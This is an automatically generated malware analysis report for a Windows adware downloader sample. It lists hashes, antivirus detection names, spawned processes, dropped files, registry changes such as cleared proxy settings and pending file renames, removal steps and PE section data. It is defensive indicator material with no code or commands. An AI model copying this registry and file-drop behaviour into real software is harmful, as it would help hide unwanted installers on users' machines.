Detections: not-a-virus:AdWare.Win32.AdLoad.wvar (Kaspersky), Application.Downloader.RO (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 325175aa976eef22d0cc911fbcfdef64
SHA1: 9ed52ce5a43dc37a4ffd38d410301f4766774b90
SHA256: bf5cf82787dc628f22f7ab2cd8a01573e1c9e56d18bd7a46295a3787da05ba50
SSDeep: 12288:BK2mhAMJ/cPlJHiqQF2qTuxS7R38JK8l924IqPKZ5SRWocW:w2O/GlJHQ1lR38Jpl9XIqYIWDW
Size: 582736 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Hul
Created at: 2012-06-09 16:19:49
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Application creates the following process(es):
Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884
The Application injects its code into the following process(es):
Setup__2140_il2.exe:3512
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Setup__2140_il2.exe:2308 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
The process Setup__2140_il2.exe:3512 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
The process sevensetup.exe:3356 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
The Application deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd584D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (0 bytes)
The process %original file name%.exe:3580 makes changes in the file system.
The Application creates and/or writes to the following file(s):
The Application deletes the following file(s):
The process cpSetup.exe:3976 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
The process run-setup.exe:3884 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)
The Application deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC40.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp (0 bytes)
Registry activity
The process Setup__2140_il2.exe:2308 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\noesis.beryline]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"
[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following registry key(s):
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
[HKCR\noesis.beryline\CurVer]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
[HKCR\noesis.beryline.1\CLSID]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Programmable]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
[HKCR\noesis.beryline]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
[HKCR\noesis.beryline.1]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process Setup__2140_il2.exe:3512 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}]
"(Default)" = "Inst Class"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline.1\CLSID]
"(Default)" = "{ca90508a-de03-464c-b43f-2ab03068b458}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\VersionIndependentProgID]
"(Default)" = "noesis.beryline"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\ProgID]
"(Default)" = "noesis.beryline.1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}]
"(Default)" = "IBoot"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\noesis.beryline]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\TypeLib\{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCR\noesis.beryline\CurVer]
"(Default)" = "noesis.beryline.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3B 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1476603965"
[HKCR\noesis.beryline.1]
"(Default)" = "Inst Class"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"(Default)" = "{B12FC5B9-4613-4FF8-8F59-17F01C4B0F69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\TypeLib]
"(Default)" = "{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}"
[HKCR\CLSID\{ca90508a-de03-464c-b43f-2ab03068b458}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKCR\Interface\{D7D4F17C-D605-4F5D-A1E0-278E43AA1E09}\TypeLib]
"Version" = "1.0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process sevensetup.exe:3356 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 3F 7A 79 6D 3D D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3580 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Application deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process cpSetup.exe:3976 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479002472"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "E0 01 3A 79 6D 3D D2 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process 5827498a25abb_ua.exe:2980 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
The process run-setup.exe:3884 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe,"
Dropped PE files
MD5 | File path |
---|---|
a7318ed2c34bd30f5605e0457734826f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll |
aa91653a46d59ef020669de66aa1fb31 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:2308
sevensetup.exe:3356
%original file name%.exe:3580
cpSetup.exe:3976
5827498a25abb_ua.exe:2980
run-setup.exe:3884
- Delete the original Application file.
- Delete or disinfect the following files created/modified by the Application:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7653 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\index[1].htm (6816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A3UADNX3.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NJKJZZRQ.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss585D.tmp\5827498a25abb_ua.exe (297179 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ii_start.txt (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe (51498 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cpSetup.exe (52307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiC41.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\sevensetup.exe (3263 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
.rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
.data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
.CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
.rsrc | 192512 | 16656 | 16896 | 3.23905 | aa3a7d7ff24a928d00c7a73daacad998 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 567
01d8f21bdcf3f33cfd44b21cda45bbe1
c9ab4e6c1cfc8ff69ab509756fb4bbb2
a93831bd552da93e3bc3af481883f0cb
8512a38a32d856c43d3d53d1298cdf48
27a2aefa7a8141c7e4d47e4e4e4912dd
62535b8e1ac59d327110d422df7027bc
79f46ad15df03ce32082a5b77e5e8484
19154cb115d8d2adce3b82459253bbb3
1ad22ffca5f98db241175ce6612e1c6c
77653dae69494148cf58389a89a9bd40
9663e05c1cb81a47db70ac43ebb824e1
5e2e21eb1cccabe74a231dc8ee7e45ab
a08d1145184718c8cfb3e674cb51bf37
7ec5648ba6020db188003cab70553f79
b1220d6c3e4fc06ac894d65353fb84e6
b0516e031ff5e44241d3bd16b28983d8
64989f7c46d4103fa833fe61c529a1bf
62379b050ee5ee24b5710d77976e4a4c
